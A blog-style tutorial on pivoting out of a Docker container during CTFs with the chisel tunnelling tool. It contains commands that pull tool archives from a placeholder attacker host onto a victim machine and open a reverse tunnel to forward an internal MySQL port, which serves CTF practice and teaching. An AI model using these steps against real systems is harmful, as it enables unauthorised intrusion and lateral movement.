Getting started with Chisel in CTFs

It’s not uncommon to land in a Docker environment when playing CTFs.

After exploiting some vulnerability, you have your shell and you look into the /home folder. Crap! There’s nothing inside! The flags you are looking for are definitely elsewhere.

If it’s a Docker machine, you might feel screwed. How the heck can you escape from this trap?

Disclaimer

The attack we’ll see in this post is a classic one you’ll find in many CTFs, but that does not mean it’s the ultimate strategy every time you need to escape from Docker.

How do I know it’s a Docker instance?

There are easy ways to confirm you are in a Docker instance, for example:

  • cat /etc/hosts: if you find something like 172.x.x.x,
  • netstat -ano: you may find quite similar IPs
  • CTFs often use the default subnet 172.17.0.0/16

N.B.: Note that, most of the time, your unauthorized shell is restricted, so you can’t use/install all the classic tools and commands.

At this point, things may appear more difficult than expected.

There could be other instances in the network, but how can you enumerate them? Lucky for you, you’re already inside the network.

Typing nmap will likely return “command not found”, but you can download these nmap static binaries on your attacker’s machine, start a local server, for example:

python3 -m http.server 8001

And then download the tools using wget or curl on the victim machine from:

http://{IP_ATTACKER}:8001/archive.tar.gz

N.B.: I like to compress all tools in a single archive to ship everything at once.

After decompressing the archive on the victim’s machine, you should be able to use the binaries to perform various nmap analysis, including full scans.

If you find other IPs with interesting services such as databases (e.g., ports 3306, 27017), FTP (e.g., port 21), HTTP (e.g., port 80), or HTTPS (e.g., port 443), it probably means you have to use a classic technique called pivoting.

How to forward ports with chisel

Pivoting is a classic approach in the pen-testing world.

In real conditions, it’s not uncommon to chain pivots, using a vulnerable system to reach another one in the network, and so on until you get what you want.

In this case, it may be more accurate to use the term “lateral movement,” but, in my experience, CTFs rarely go that far.

Instead, you usually have to create a simple tunnel between your attacker’s machine and one of the instances in the network to access to the targeted services.

chisel is an extra-powerful binary written in Go that can forward ports.

N.B.: Note that you may have to build it with custom values for GOARCH or GOOS to make it work. Please read the doc.

You can start by sending an archive containing the chisel binary to the victim’s machine, like we did earlier with the nmap binaries.

The idea is to have the binary on your attacker’s machine AND the victim’s machine to create a tunnel quickly. Assuming we want to forward a port used by a Mysql server, we can use something like the following:

# on our machine
chmod +x chisel 
./chisel server -p 9001 --reverse

# after that, on the victim's machine
chmod +x chisel
./chisel client {IP_ATTACKER}:9001 R:3306:{IP_DOCKER_TARGET}:3306

Once it’s done, we can connect to the mysql server like it’s a local server:

mysql -h 127.0.0.1 {DATABASE} -u {USER} -p 

N.B: The credentials are usually discovered earlier (e.g., in /var/www) or maybe there’s no password at all.

N.B: {IP_DOCKER_TARGET} is an internal network IP. It’s usually something like 172.x.x.x.

We have just mapped the port 3306 of the targeted instance to our local port 3306. That’s why it’s the same number, but don’t be confused, the order is:

R:{LOCAL_PORT}:{IP_DOCKER_TARGET}:{FORWARDED_PORT}

Making sense of static forward

We have a listener on our machine thanks to the ./chisel server command. The tunnel is created with the ./chisel client command on the victim’s machine.

Creating listeners to connect machines through a reverse tunnel is one of the most common tactics in hacking. The specific technique we used here is called static forwarding.

Of course, it’s not the only option you have, and you sometimes need to forward port dynamically using, for example, a socks proxy (e.g., with the --socks5 option and the socks mode). There are more complex situations where you need to go deeper in the layers of a network.

It’s not uncommon to route the attacker’s traffic with the victim’s machine using proxychains.

It’s a lot of big words, but the goal is actually simple: you want your traffic to appear as it originates from the victim.

Wrap up

Hope you enjoy this short introduction to chisel and static forwarding. It’s usually enough to get to the next step during a CTF, even if the hardest ones might expect you to go deeper with dynamic forwarding.

The tool is completely free, open-source, portable, easy to use, and you can build the binary for various configurations and architectures.

See Also